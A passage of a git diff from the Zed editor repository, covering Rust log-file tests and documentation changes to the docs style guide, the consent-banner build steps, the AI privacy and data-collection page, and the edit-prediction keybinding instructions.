assert_eq!(size.load(Ordering::Acquire), 0); + assert_eq!(std::fs::read_to_string(&log_file_path).unwrap(), ""); + } + + #[test] + fn test_open_or_create_log_file() { + let temp_dir = tempfile::tempdir().unwrap(); + let log_file_path = temp_dir.path().join("log.txt"); + let rotation_log_file_path = temp_dir.path().join("log_rotated.txt"); + + let contents = String::from("Hello, world!"); + std::fs::write(&log_file_path, &contents).unwrap(); + + open_or_create_log_file(&log_file_path, 
Some(&rotation_log_file_path), !0).unwrap(); + + assert!(log_file_path.exists()); + assert_eq!(log_file_path.metadata().unwrap().len(), 13); + assert!(!rotation_log_file_path.exists()); + assert_eq!(std::fs::read_to_string(&log_file_path).unwrap(), contents); } /// Regression test, ensuring that if log level values change we are made aware diff --git a/docs/.doc-examples/complex-feature.md b/docs/.doc-examples/complex-feature.md index 6a859ce5041f0e39834cc5f47f5b18248a15295e..745e6b3bcdc97dc35092bb651903f37435acc1ef 100644 --- a/docs/.doc-examples/complex-feature.md +++ b/docs/.doc-examples/complex-feature.md @@ -91,11 +91,11 @@ To disable word diff for specific languages only, add this to your settings.json File History shows the commit history for an individual file. Each entry displays the commit's author, timestamp, and message. Selecting a commit opens a diff view filtered to show only the changes made to that file in that commit. -To open File History: +To view File History: -- Right-click on a file in the Project Panel and select "Open File History" -- Right-click on a file in the Git Panel and select "Open File History" -- Right-click on an editor tab and select "Open File History" +- Right-click on a file in the Project Panel and select "View File History" +- Right-click on a file in the Git Panel and select "View File History" +- Right-click on an editor tab and select "View File History" - Use the Command Palette and search for "file history" ## Fetch, Push, and Pull {#fetch-push-pull} diff --git a/docs/.prettierignore b/docs/.prettierignore index a52439689a83a1c2e834918c39441186b47120e5..c742ed4b6859f32219cecbac9f722db8a6929710 100644 --- a/docs/.prettierignore +++ b/docs/.prettierignore @@ -1,2 +1,5 @@ # Handlebars partials are not supported by Prettier. 
*.hbs + +# Automatically generated +theme/c15t@*.js diff --git a/docs/AGENTS.md b/docs/AGENTS.md index fdd61ff6aeaf8cd09ae0b017c5199e7033fba964..54f477472b1b4d22f06623220d5fb4a3eb181db4 100644 --- a/docs/AGENTS.md +++ b/docs/AGENTS.md @@ -126,6 +126,59 @@ Images are hosted externally. Reference format: - With anchors: `[Custom Models](./llm-providers.md#anthropic-custom-models)` - Parent directory: `[Telemetry](../telemetry.md)` +## Voice and Tone + +### Core Principles + +- **Practical over promotional**: Focus on what users can do, not on selling Zed. Avoid marketing language like "powerful," "revolutionary," or "best-in-class." +- **Honest about limitations**: When Zed lacks a feature or doesn't match another tool's depth, say so directly. Pair limitations with workarounds or alternative workflows. +- **Direct and concise**: Use short sentences. Get to the point. Developers are scanning, not reading novels. +- **Second person**: Address the reader as "you." Avoid "the user" or "one." +- **Present tense**: "Zed opens the file" not "Zed will open the file." + +### What to Avoid + +- Superlatives without substance ("incredibly fast," "seamlessly integrated") +- Hedging language ("simply," "just," "easily")—if something is simple, the instructions will show it +- Apologetic tone for missing features—state the limitation and move on +- Comparisons that disparage other tools—be factual, not competitive +- Lots of use of em or en dashes. + +## Examples of Good Copy + +### Good: Direct and actionable + +``` +To format on save, open the Settings Editor (`Cmd+,`) and search for `format_on_save`. Set it to `on`. + +Or add this to your settings.json: +{ + "format_on_save": "on" +} +``` + +### Bad: Wordy and promotional + +``` +Zed provides a powerful and seamless formatting experience. Simply navigate to the settings and you'll find the format_on_save option which enables Zed's incredible auto-formatting capabilities. 
+``` + +### Good: Honest about limitations + +``` +Zed doesn't index your project like IntelliJ does. You open a folder and start working immediately—no waiting. The trade-off: cross-project analysis relies on language servers, which may not go as deep. + +**How to adapt:** +- Use `Cmd+Shift+F` for project-wide text search +- Use `Cmd+O` for symbol search (powered by your language server) +``` + +### Bad: Defensive or dismissive + +``` +While some users might miss indexing, Zed's approach is actually better because it's faster. +``` + ## Scope ### In-Scope Documentation @@ -204,13 +257,14 @@ Inherit all conventions from `docs/.rules`. Key points: ### Terminology -| Use | Instead of | -| --------------- | -------------------------------------- | -| folder | directory | -| project | workspace | -| Settings Editor | settings UI | -| command palette | command bar | -| panel | sidebar (be specific: "Project Panel") | +| Use | Instead of | +| --------------- | --------------------------------------------------------------------- | +| folder | directory | +| project | workspace | +| Settings Editor | settings UI | +| command palette | command bar | +| panel | tool window, sidebar (be specific: "Project Panel," "Terminal Panel") | +| language server | LSP (spell out first use, then LSP is fine) | ## Zed-Specific Conventions diff --git a/docs/README.md b/docs/README.md index e1649f4bc99e1668352a46ee2071dcfe1775f4a7..38be153de34b7e32e410fa67710297cca653d699 100644 --- a/docs/README.md +++ b/docs/README.md @@ -4,12 +4,15 @@ Welcome to Zed's documentation. This is built on push to `main` and published automatically to [https://zed.dev/docs](https://zed.dev/docs). 
-To preview the docs locally you will need to install [mdBook](https://rust-lang.github.io/mdBook/) (`cargo install mdbook@0.4.40`) and then run: +To preview the docs locally you will need to install [mdBook](https://rust-lang.github.io/mdBook/) (`cargo install mdbook@0.4.40`), generate the action metadata, and then serve: ```sh +script/generate-action-metadata mdbook serve docs ``` +The first command dumps an action manifest to `crates/docs_preprocessor/actions.json`. Without it, the preprocessor cannot validate keybinding and action references in the docs and will report errors. You only need to re-run it when actions change. + It's important to note the version number above. For an unknown reason, as of 2025-04-23, running 0.4.48 will cause odd URL behavior that breaks things. Before committing, verify that the docs are formatted in the way Prettier expects with: @@ -53,6 +56,14 @@ This will output a code element like: `Cmd + , | Ctrl + ,`. We then By using the action name, we can ensure that the keybinding is always up-to-date rather than hardcoding the keybinding. +#### Keymap Overlays + +`{#kb:keymap_name scope::Action}` - e.g., `{#kb:jetbrains editor::GoToDefinition}`. + +This resolves the keybinding from a keymap overlay (e.g., JetBrains) first, falling back to the default keymap if the overlay doesn't define a binding for that action. This is useful for sections where the documentation expects a special base keymap to be configured. + +Supported overlays: `jetbrains`. + ### Actions `{#action scope::Action}` - e.g., `{#action zed::OpenSettings}`. @@ -64,6 +75,22 @@ This will render a human-readable version of the action name, e.g., "zed: open s Templates are functions that modify the source of the docs pages (usually with a regex match and replace). You can see how the actions and keybindings are templated in `crates/docs_preprocessor/src/main.rs` for reference on how to create new templates. 
+## Consent Banner
+
+We pre-bundle the `c15t` package because the docs pipeline does not include a JS bundler. If you need to update `c15t` and rebuild the bundle, use:
+
+```
+mkdir c15t-bundle && cd c15t-bundle
+npm init -y
+npm install c15t@<version> esbuild
+echo "import { getOrCreateConsentRuntime } from 'c15t'; window.c15t = { getOrCreateConsentRuntime };" > entry.js
+npx esbuild entry.js --bundle --format=iife --minify --outfile=c15t@<version>.js
+cp c15t@<version>.js ../theme/c15t@<version>.js
+cd .. && rm -rf c15t-bundle
+```
+
+Replace `<version>` with the new version of `c15t` you are installing. Then update `book.toml` to reference the new bundle filename.
+
 ### References
 
 - Template Trait: `crates/docs_preprocessor/src/templates.rs`
diff --git a/docs/book.toml b/docs/book.toml
index 86fa447f581fba88ff7df53bb51e08440585a9dc..3269003a1d37ede19ec18b62809a928a08764d2f 100644
--- a/docs/book.toml
+++ b/docs/book.toml
@@ -23,8 +23,8 @@ default-description = "Learn how to use and customize Zed, the fast, collaborati
 default-title = "Zed Code Editor Documentation"
 no-section-label = true
 preferred-dark-theme = "dark"
-additional-css = ["theme/page-toc.css", "theme/plugins.css", "theme/highlight.css"]
-additional-js = ["theme/page-toc.js", "theme/plugins.js"]
+additional-css = ["theme/page-toc.css", "theme/plugins.css", "theme/highlight.css", "theme/consent-banner.css"]
+additional-js = ["theme/page-toc.js", "theme/plugins.js", "theme/c15t@2.0.0-rc.3.js", "theme/analytics.js"]
 
 [output.zed-html.print]
 enable = false
diff --git a/docs/src/SUMMARY.md b/docs/src/SUMMARY.md
index 2b45c581685e9ecb63888edd256ec14b0da94a30..2dca46d99a4a274300e82f67b6f0eac96bb55ee9 100644
--- a/docs/src/SUMMARY.md
+++ b/docs/src/SUMMARY.md
@@ -17,7 +17,6 @@
 - [External Agents](./ai/external-agents.md)
 - [Inline Assistant](./ai/inline-assistant.md)
 - [Edit Prediction](./ai/edit-prediction.md)
-- [Text Threads](./ai/text-threads.md)
 - [Rules](./ai/rules.md)
 - [Model Context Protocol](./ai/mcp.md)
 - 
[Configuration](./ai/configuration.md) @@ -45,6 +44,7 @@ - [Debugger](./debugger.md) - [REPL](./repl.md) - [Git](./git.md) +- [Modelines](./modelines.md) # Collaboration @@ -161,7 +161,7 @@ - [Debugger Extensions](./extensions/debugger-extensions.md) - [Theme Extensions](./extensions/themes.md) - [Icon Theme Extensions](./extensions/icon-themes.md) -- [Slash Command Extensions](./extensions/slash-commands.md) +- [Snippets Extensions](./extensions/snippets.md) - [Agent Server Extensions](./extensions/agent-servers.md) - [MCP Server Extensions](./extensions/mcp-extensions.md) @@ -182,6 +182,7 @@ # Account & Privacy - [Authenticate](./authentication.md) +- [Roles](./roles.md) - [Privacy and Security](./ai/privacy-and-security.md) - [Worktree Trust](./worktree-trust.md) - [AI Improvement](./ai/ai-improvement.md) diff --git a/docs/src/ai/agent-panel.md b/docs/src/ai/agent-panel.md index 7e183d38550d3624a0c9a48051e95ca4c568d72d..89b0126c55a12b08d4f21a01fea38758c4d509b7 100644 --- a/docs/src/ai/agent-panel.md +++ b/docs/src/ai/agent-panel.md @@ -34,7 +34,7 @@ The sections below cover what you can do from here. By default, the Agent Panel uses Zed's first-party agent. -To choose another agent, go to the plus button in the top-right of the Agent Panel and pick either one of the [external agents](./external-agents.md) installed out of the box or a new [Text Thread](./text-threads.md). +To choose another agent, go to the plus button in the top-right of the Agent Panel and pick one of the [external agents](./external-agents.md) installed out of the box. ### Editing Messages {#editing-messages} @@ -67,7 +67,9 @@ Right-click on any agent response in the thread view to access a context menu wi ### Navigating the Thread {#navigating-the-thread} -In long conversations, use the scroll arrow buttons at the bottom of the panel to jump to your most recent prompt or to the very beginning of the thread. 
+In long conversations, use the scroll arrow buttons at the bottom of the panel to jump to your most recent prompt or to the very beginning of the thread. You can also scroll the thread using arrow keys, Page Up/Down, Home/End, and Shift+Page Up/Down to jump between messages, when the thread pane is focused. + +When focus is in the message editor, you can also use {#kb agent::ScrollOutputPageUp}, {#kb agent::ScrollOutputPageDown}, {#kb agent::ScrollOutputToTop}, {#kb agent::ScrollOutputToBottom}, {#kb agent::ScrollOutputLineUp}, and {#kb agent::ScrollOutputLineDown} to navigate the thread, or {#kb agent::ScrollOutputToPreviousMessage} and {#kb agent::ScrollOutputToNextMessage} to jump between your prompts. ### Navigating History {#navigating-history} @@ -222,15 +224,6 @@ All [Zed's hosted models](./models.md) support tool calling out-of-the-box. Similarly to the built-in tools, some models may not support all tools included in a given MCP Server. Zed's UI will inform you about this via a warning icon that appears close to the model selector. -## Text Threads {#text-threads} - -["Text Threads"](./text-threads.md) present your conversation with the LLM in a different format—as raw text. -With text threads, you have full control over the conversation data. -You can remove and edit responses from the LLM, swap roles, and include more context earlier in the conversation. - -Text threads are Zed's original assistant panel format, preserved for users who want direct control over conversation data. -Autonomous code editing (where the agent writes to files) is only available in the default thread format, not text threads. - ## Errors and Debugging {#errors-and-debugging} If you hit an error or unusual LLM behavior, open the thread as Markdown with `agent: open thread as markdown` and attach it to your GitHub issue. 
diff --git a/docs/src/ai/agent-settings.md b/docs/src/ai/agent-settings.md index 0547f19c9ca0e58cb5d63d7ae1c5231d091a6503..28ee927e4ab4110e6e46a4a8d551093243d72a09 100644 --- a/docs/src/ai/agent-settings.md +++ b/docs/src/ai/agent-settings.md @@ -1,6 +1,6 @@ --- title: AI Agent Settings - Zed -description: Customize Zed's AI agent: default models, temperature, tool approval, auto-run commands, notifications, and panel options. +description: "Customize Zed's AI agent: default models, temperature, tool approval, auto-run commands, notifications, and panel options." --- # Agent Settings @@ -140,19 +140,6 @@ Specify a custom temperature for a provider and/or model: Note that some of these settings are also surfaced in the Agent Panel's settings UI, which you can access either via the `agent: open settings` action or by the dropdown menu on the top-right corner of the panel. -### Default View - -Use the `default_view` setting to change the default view of the Agent Panel. -You can choose between `thread` (the default) and `text_thread`: - -```json [settings] -{ - "agent": { - "default_view": "text_thread" - } -} -``` - ### Font Size Use the `agent_ui_font_size` setting to change the font size of rendered agent responses in the panel. @@ -305,13 +292,16 @@ The default value is `false`. ### Sound Notification -Control whether to hear a notification sound when the agent is done generating changes or needs your input. -The default value is `false`. +Control whether to hear a notification sound when the agent is done generating changes or needs your input. The default value is `never`. + +- `"never"` (default) — Never play the sound. +- `"when_hidden"` — Only play the sound when the agent panel is not visible. +- `"always"` — Always play the sound on completion. 
```json [settings] { "agent": { - "play_sound_when_agent_done": true + "play_sound_when_agent_done": "never" } } ``` diff --git a/docs/src/ai/ai-improvement.md b/docs/src/ai/ai-improvement.md index 94085058f237b942f29d43f8d82b2f0afa97a782..b1fda4cbf6c6bbc7db395394a420afbbaecfa57d 100644 --- a/docs/src/ai/ai-improvement.md +++ b/docs/src/ai/ai-improvement.md @@ -3,73 +3,98 @@ title: AI Improvement and Data Collection - Zed description: Zed's opt-in approach to AI data collection for improving the agent panel and edit predictions. --- -# Zed AI Improvement +# Zed AI Features and Privacy -## Agent Panel +## Overview -### Opt-In +AI features in Zed include: -When you use the Agent Panel through any of these means: +- [Agent Panel](./agent-panel.md) +- [Edit Predictions](./edit-prediction.md) +- [Inline Assist](./inline-assistant.md) +- Auto Git Commit Message Generation -- [Zed's hosted models](./subscription.md) -- [connecting a non-Zed AI service via API key](./llm-providers.md) -- using an [external agent](./external-agents.md) +By default, Zed does not store your prompts or code context. This data is sent to your selected AI provider (e.g., Anthropic, OpenAI, Google, or xAI) to generate responses, then discarded. Zed will not use your data to evaluate or improve AI features unless you explicitly share it (see [AI Feedback with Ratings](#ai-feedback-with-ratings)) or you opt in to edit prediction training data collection (see [Edit Predictions](#edit-predictions)). + +Zed is model-agnostic by design, and none of this changes based on which provider you choose. You can use your own API keys or Zed's hosted models without any data being retained. + +### Data Retention and Training -Zed does not persistently store user content or use user content to evaluate and/or improve our AI features, unless it is explicitly shared with Zed. Each share is opt-in, and sharing once will not cause future content or data to be shared again. 
+Zed's Agent Panel can be used via: -> Note that rating responses will send your data related to that response to Zed's servers. -> **_If you don't want data persisted on Zed's servers, don't rate_**. We will not collect data for improving our Agentic offering without you explicitly rating responses. +- [Zed's hosted models](./subscription.md) +- [connecting a non-Zed AI service via API key](./llm-providers.md) +- using an [external agent](./external-agents.md) via ACP -When using upstream services through Zed's hosted models, we require assurances from our service providers that your user content won't be used for training models. +When using Zed's hosted models, we require assurances from our service providers that your user content won't be used for training models. | Provider | No Training Guarantee | Zero-Data Retention (ZDR) | | --------- | ------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------- | | Anthropic | [Yes](https://www.anthropic.com/legal/commercial-terms) | [Yes](https://privacy.anthropic.com/en/articles/8956058-i-have-a-zero-data-retention-agreement-with-anthropic-what-products-does-it-apply-to) | | Google | [Yes](https://cloud.google.com/terms/service-terms) | [Yes](https://cloud.google.com/terms/service-terms), see Service Terms sections 17 and 19h | | OpenAI | [Yes](https://openai.com/enterprise-privacy/) | [Yes](https://platform.openai.com/docs/guides/your-data) | +| xAI | [Yes](https://x.ai/legal/faq-enterprise) | [Yes](https://x.ai/legal/faq-enterprise) | When you use your own API keys or external agents, **Zed does not have control over how your data is used by that service provider.** You should reference your agreement with each service provider to understand what terms and conditions apply. 
-### Data we collect +### AI Feedback with Ratings + +You can provide feedback on Zed's AI features by rating specific AI responses in Zed and sharing details related to those conversations with Zed. Each share is opt-in, and sharing once will not cause future content or data to be shared again. + +> **Rating = Data Sharing:** When you rate a response, your entire conversation thread is sent to Zed. This includes messages, AI responses, and thread metadata. +> **_If you don't want data persisted on Zed's servers, don't rate_**. We will not collect data for improving our AI features without you explicitly rating responses. -For prompts you have explicitly shared with us, Zed may store copies of those prompts and other data about the specific use of the Agent Panel. +### Data Collected (AI Feedback) -This data includes: +For conversations you have explicitly shared with us via rating, Zed may store: -- The prompt given to the Agent -- Any commentary you include -- Product telemetry about the agentic thread +- All messages in the thread (your prompts and AI responses) +- Any commentary you include with your rating +- Thread metadata (model used, token counts, timestamps) - Metadata about your Zed installation -### Data Handling +If you do not rate responses, Zed will not store Customer Data (code, conversations, responses) related to your usage of the AI features. + +Telemetry related to Zed's AI features is collected. This includes metadata such as the AI feature being used and high-level interactions with the feature to understand performance (e.g., Agent response time, edit acceptance/rejection in the Agent panel or edit completions). You can read more in Zed's [telemetry](../telemetry.md) documentation. Collected data is stored in Snowflake, a private database. We periodically review this data to refine the agent's system prompt and tool use. All data is anonymized and stripped of sensitive information (access tokens, user IDs, email addresses). 
## Edit Predictions -By default, when using Zed Edit Predictions, Zed does not persistently store user content or use user content for training of its models. +Edit predictions can be powered by **Zed's Zeta model** or by **third-party providers** like GitHub Copilot. + +### Zed's Zeta Model (Default) + +Zed sends a limited context window to the model to generate predictions: + +- A code excerpt around your cursor (not the full file) +- Recent edits as diffs +- Relevant excerpts from related open files -### Opt-in +This data is processed transiently to generate predictions and is not retained afterward. -Users who are working on open source licensed projects may optionally opt-in to providing model improvement feedback. This opt-in occurs on a per-project basis. If you work on multiple open source projects and wish to provide model improvement feedback you will have to opt-in for each individual project. +### Third-Party Providers -When working on other projects where you haven't opted-in, Zed will not persistently store user content or use user content for training of its models. +When using third-party providers like GitHub Copilot, **Zed does not control how your data is handled** by that provider. You should consult their Terms and Conditions directly. -You can see exactly how Zed detects open source licenses in: [license_detection.rs](https://github.com/zed-industries/zed/blob/main/crates/edit_prediction/src/license_detection.rs). +Note: Zed's `disabled_globs` settings will prevent predictions from being requested, but third-party providers may receive file content when files are opened. -### Exclusions +### Training Data: Opt-In for Open Source Projects -Zed will intentionally exclude certain files from Predictive Edits entirely, even when you have opted-in to model improvement feedback. 
+Zed does not collect training data for our edit prediction model unless the following conditions are met: -You can inspect this exclusion list by opening `zed: open default settings` from the command palette: +1. **You opt in** – Toggle "Training Data Collection" under the **Privacy** section of the edit prediction status bar menu (click the edit prediction icon in the status bar). +2. **The project is open source** — detected via LICENSE file ([see detection logic](https://github.com/zed-industries/zed/blob/main/crates/edit_prediction/src/license_detection.rs)) +3. **The file isn't excluded** — via `disabled_globs` + +### File Exclusions + +Certain files are always excluded from edit predictions—regardless of opt-in status: ```json [settings] { "edit_predictions": { - // A list of globs representing files that edit predictions should be disabled for. - // There's a sensible default list of globs already included. - // Any addition to this list will be merged with the default list. "disabled_globs": [ "**/.env*", "**/*.pem", @@ -92,22 +117,17 @@ Users may explicitly exclude additional paths and/or file extensions by adding t } ``` -### Data we collect - -For open source projects where you have opted-in, Zed may store copies of requests and responses to the Zed AI Prediction service. - -This data includes: +### Data Collected (Edit Prediction Training Data) -- sampled edit prediction examples (cursor context + recent diffs/edits) for offline evaluation -- the edit prediction -- a portion of the buffer content around the cursor -- a few recent edits -- the current buffer outline -- diagnostics (errors, warnings, etc) from language servers +For open source projects where you've opted in, Zed may collect: -### Data Handling +- Code excerpt around your cursor +- Recent edit diffs +- The generated prediction +- Repository URL and git revision +- Buffer outline and diagnostics -Collected data is stored in Snowflake, a private database. 
We periodically select training samples from this data. All data is anonymized and stripped of sensitive information (access tokens, user IDs, email addresses). The training dataset is publicly available at [huggingface.co/datasets/zed-industries/zeta](https://huggingface.co/datasets/zed-industries/zeta). +Collected data is stored in Snowflake. We periodically review this data to select training samples for inclusion in our model training dataset. We ensure any included data is anonymized and contains no sensitive information (access tokens, user IDs, email addresses, etc). This training dataset is publicly available at [huggingface.co/datasets/zed-industries/zeta](https://huggingface.co/datasets/zed-industries/zeta). ### Model Output @@ -115,4 +135,4 @@ We then use this training dataset to fine-tune [Qwen2.5-Coder-7B](https://huggin ## Applicable terms -Please see the [Zed Terms of Service](https://zed.dev/terms-of-service) for more. +Please see the [Zed Terms of Service](https://zed.dev/terms) for more. diff --git a/docs/src/ai/edit-prediction.md b/docs/src/ai/edit-prediction.md index 973dc9546a8b81ad58fc996102ff25aed2d241a9..496bf925e5b137c8b4749207c6785d30913440ae 100644 --- a/docs/src/ai/edit-prediction.md +++ b/docs/src/ai/edit-prediction.md @@ -1,21 +1,23 @@ --- -title: AI Code Completion in Zed - Zeta, Copilot, Sweep, Mercury Coder -description: Set up AI code completions in Zed with Zeta (built-in), GitHub Copilot, Sweep, Codestral, or Mercury Coder. Multi-line predictions on every keystroke. +title: AI Code Completion in Zed - Zeta, Copilot, Codestral, Mercury Coder +description: Set up AI code completions in Zed with Zeta (built-in), GitHub Copilot, Codestral, or Mercury Coder. Multi-line predictions on every keystroke. --- # Edit Prediction Edit Prediction is how Zed's AI code completions work: an LLM predicts the code you want to write. 
-Each keystroke sends a new request to the edit prediction provider, which returns individual or multi-line suggestions that can be quickly accepted by pressing `tab`. +Each keystroke sends a new request to the edit prediction provider, which returns individual or multi-line suggestions you accept by pressing `tab`. -The default provider is [Zeta, a proprietary open source and open dataset model](https://huggingface.co/zed-industries/zeta), but you can also use [other providers](#other-providers) like GitHub Copilot, Sweep, Mercury Coder, and Codestral. +The default provider is [Zeta, a proprietary open source and open dataset model](https://huggingface.co/zed-industries/zeta), but you can also use [other providers](#other-providers) like GitHub Copilot, Mercury Coder, and Codestral. ## Configuring Zeta To use Zeta, [sign in](../authentication.md#what-features-require-signing-in). Once signed in, predictions appear as you type. -You can confirm that Zeta is properly configured either by verifying whether you have the following code in your settings file: +You can confirm that Zeta is properly configured by opening the [Settings Editor](zed://settings/edit_predictions.providers) (`Cmd+,` on macOS or `Ctrl+,` on Linux/Windows) and searching for `edit_predictions`. The `provider` field should be set to `Zed AI`. + +Or verify this in your settings.json: ```json [settings] { @@ -33,7 +35,7 @@ The free plan includes 2,000 Zeta predictions per month. The [Pro plan](../ai/pl ### Switching Modes {#switching-modes} -Zed's Edit Prediction comes with two different display modes: +Edit Prediction has two display modes: 1. `eager` (default): predictions are displayed inline as long as it doesn't conflict with language server completions 2. `subtle`: predictions only appear inline when holding a modifier key (`alt` by default) @@ -52,191 +54,93 @@ Or directly via the UI through the status bar menu: > Note that edit prediction modes work with any prediction provider. 
-### Conflict With Other `tab` Actions {#edit-predictions-conflict} - -By default, when `tab` would normally perform a different action, Zed requires a modifier key to accept predictions: +## Default Key Bindings -1. When the language server completions menu is visible. -2. When your cursor isn't at the right indentation level. +On macOS and Windows, you can accept edit predictions with `alt-tab`. On Linux, `alt-tab` is often used by the window manager for switching windows, so `alt-l` is the default key binding for edit predictions. -In these cases, `alt-tab` is used instead to accept the prediction. When the language server completions menu is open, holding `alt` first will cause it to temporarily disappear in order to preview the prediction within the buffer. - -On Linux, `alt-tab` is often used by the window manager for switching windows, so `alt-l` is provided as the default binding for accepting predictions. `tab` and `alt-tab` also work, but aren't displayed by default. +In `eager` mode, you can also use the `tab` key to accept edit predictions, unless the completion menu is open, in which case `tab` accepts LSP completions. To use `tab` to insert whitespace, you need to dismiss the prediction with {#kb editor::Cancel} before hitting `tab`. {#action editor::AcceptNextWordEditPrediction} ({#kb editor::AcceptNextWordEditPrediction}) can be used to accept the current edit prediction up to the next word boundary. {#action editor::AcceptNextLineEditPrediction} ({#kb editor::AcceptNextLineEditPrediction}) can be used to accept the current edit prediction up to the new line boundary. ## Configuring Edit Prediction Keybindings {#edit-predictions-keybinding} -By default, `tab` is used to accept edit predictions. 
You can use another keybinding by inserting this in your keymap: - -```json [keymap] -{ - "context": "Editor && edit_prediction", - "bindings": { - // Here we also allow `alt-enter` to accept the prediction - "alt-enter": "editor::AcceptEditPrediction" - } -} -``` - -When there's a [conflict with the `tab` key](#edit-predictions-conflict), Zed uses a different key context to accept keybindings (`edit_prediction_conflict`). -If you want to use a different one, you can insert this in your keymap: - -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict", - "bindings": { - "ctrl-enter": "editor::AcceptEditPrediction" // Example of a modified keybinding - } -} -``` - -If your keybinding contains a modifier (`ctrl` in the example above), it will also be used to preview the edit prediction and temporarily hide the language server completion menu. - -You can also bind this action to keybind without a modifier. -In that case, Zed will use the default modifier (`alt`) to preview the edit prediction. 
- -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict", - "bindings": { - // Here we bind tab to accept even when there's a language server completion - // or the cursor isn't at the correct indentation level - "tab": "editor::AcceptEditPrediction" - } -} -``` - -To maintain the use of the modifier key for accepting predictions when there is a language server completions menu, but allow `tab` to accept predictions regardless of cursor position, you can specify the context further with `showing_completions`: - -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict && !showing_completions", - "bindings": { - // Here we don't require a modifier unless there's a language server completion - "tab": "editor::AcceptEditPrediction" - } -} -``` - ### Keybinding Example: Always Use Tab -If you want to use `tab` to always accept edit predictions, you can use the following keybinding: +To always use `tab` for accepting edit predictions, regardless of whether the LSP completions menu is open, you can add the following to your keymap: -```json [keymap] -{ - "context": "Editor && edit_prediction_conflict && showing_completions", - "bindings": { - "tab": "editor::AcceptEditPrediction" - } -} -``` +Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and hit `edit`. Then change the context the binding is active in to just `Editor && edit_prediction` and save it. -This will make `tab` work to accept edit predictions _even when_ you're also seeing language server completions. -That means that you need to rely on `enter` for accepting the latter. - -### Keybinding Example: Always Use Alt-Tab - -The keybinding example below causes `alt-tab` to always be used instead of sometimes using `tab`. -You might want this in order to have just one (alternative) keybinding to use for accepting edit predictions, since the behavior of `tab` varies based on context. 
+Alternatively, you can put the following in your `keymap.json`: ```json [keymap] +[ { "context": "Editor && edit_prediction", "bindings": { - "alt-tab": "editor::AcceptEditPrediction" - } - }, - // Bind `tab` back to its original behavior. - { - "context": "Editor", - "bindings": { - "tab": "editor::Tab" + "tab": "editor::AcceptEditPrediction" } - }, - { - "context": "Editor && showing_completions", - "bindings": { - "tab": "editor::ComposeCompletion" - } - }, + } +] ``` -If you are using [Vim mode](../vim.md), then additional bindings are needed after the above to return `tab` to its original behavior: +After that, {#kb editor::ComposeCompletion} remains available for accepting LSP completions. -```json [keymap] - { - "context": "(VimControl && !menu) || vim_mode == replace || vim_mode == waiting", - "bindings": { - "tab": "vim::Tab" - } - }, - { - "context": "vim_mode == literal", - "bindings": { - "tab": ["vim::Literal", ["tab", "\u0009"]] - } - }, -``` +### Keybinding Example: Always Use Alt-Tab + +To stop using `tab` for accepting edit predictions and always use `alt-tab` instead, unbind the default `tab` binding in the eager edit prediction context: -### Keybinding Example: Displaying Tab and Alt-Tab on Linux +Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and delete it. -While `tab` and `alt-tab` are supported on Linux, `alt-l` is displayed instead. -If your window manager does not reserve `alt-tab`, and you would prefer to use `tab` and `alt-tab`, include these bindings in `keymap.json`: +Alternatively, you can put the following in your `keymap.json`: ```json [keymap] +[ { "context": "Editor && edit_prediction", - "bindings": { - "tab": "editor::AcceptEditPrediction", - // Optional: This makes the default `alt-l` binding do nothing. 
-      "alt-l": null
+    "unbind": {
+      "tab": "editor::AcceptEditPrediction"
     }
-  },
-  {
-    "context": "Editor && edit_prediction_conflict",
-    "bindings": {
-      "alt-tab": "editor::AcceptEditPrediction",
-      // Optional: This makes the default `alt-l` binding do nothing.
-      "alt-l": null
-    }
-  },
+  }
+]
 ```
 
-### Missing keybind {#edit-predictions-missing-keybinding}
+After that, `alt-tab` remains available for accepting edit predictions, and on Linux `alt-l` does too unless you unbind it.
 
-Zed requires at least one keybinding for the {#action editor::AcceptEditPrediction} action in both the `Editor && edit_prediction` and `Editor && edit_prediction_conflict` contexts ([learn more above](#edit-predictions-keybinding)).
+### Keybinding Example: Rebind Both Tab and Alt-Tab
 
-If you have previously bound the default keybindings to different actions in the global context, you will not be able to preview or accept edit predictions. For example:
+To move both default accept bindings to something else, unbind them and add your replacement:
 
-```json [keymap]
-[
-  // Your keymap
-  {
-    "bindings": {
-      // Binds `alt-tab` to a different action globally
-      "alt-tab": "menu::SelectNext"
-    }
-  }
-]
-```
+Open the keymap editor with {#action zed::OpenKeymap} ({#kb zed::OpenKeymap}), search for `AcceptEditPrediction`, right click on the binding for `tab` and delete it. Then right click on the binding for `alt-tab`, select "Edit", and record your desired keystrokes before hitting save.
 
-To fix this, you can specify your own keybinding for accepting edit predictions:
+Alternatively, you can put the following in your `keymap.json`:
 
 ```json [keymap]
 [
-  // ...
{ - "context": "Editor && edit_prediction_conflict", + "context": "Editor && edit_prediction", + "unbind": { + "alt-tab": "editor::AcceptEditPrediction", + // Add this as well on Windows/Linux + // "alt-l": "editor::AcceptEditPrediction", + "tab": "editor::AcceptEditPrediction" + }, "bindings": { - "alt-l": "editor::AcceptEditPrediction" + "ctrl-enter": "editor::AcceptEditPrediction" } } ] ``` -If you would like to use the default keybinding, you can free it up by either moving yours to a more specific context or changing it to something else. +In this case, because the binding contains the modifier `ctrl`, it will be used to preview the prediction in subtle mode, or when the completions menu is open. + +### Cleaning Up Older Keymap Entries + +If you configured edit prediction keybindings before Zed `v0.229.0`, your `keymap.json` may have entries that are now redundant. + +**Old tab workaround**: Before `unbind` existed, the only way to prevent `tab` from accepting edit predictions was to copy all the default non-edit-prediction `tab` bindings into your keymap alongside a custom `AcceptEditPrediction` binding. If your keymap still contains those copy-pasted entries, delete them and use a single `"unbind"` entry as shown in the examples above. + +**Renamed context**: The `edit_prediction_conflict` context has been replaced by `edit_prediction && (showing_completions || in_leading_whitespace)`. Zed automatically migrates any bindings that used `edit_prediction_conflict`, so no changes are required on your end. ## Disabling Automatic Edit Prediction @@ -329,8 +233,8 @@ If your organization uses GitHub Copilot Enterprise, you can configure Zed to us Replace `"https://your.enterprise.domain"` with the URL provided by your GitHub Enterprise administrator (e.g., `https://foo.ghe.com`). -Once set, Zed will route Copilot requests through your enterprise endpoint. 
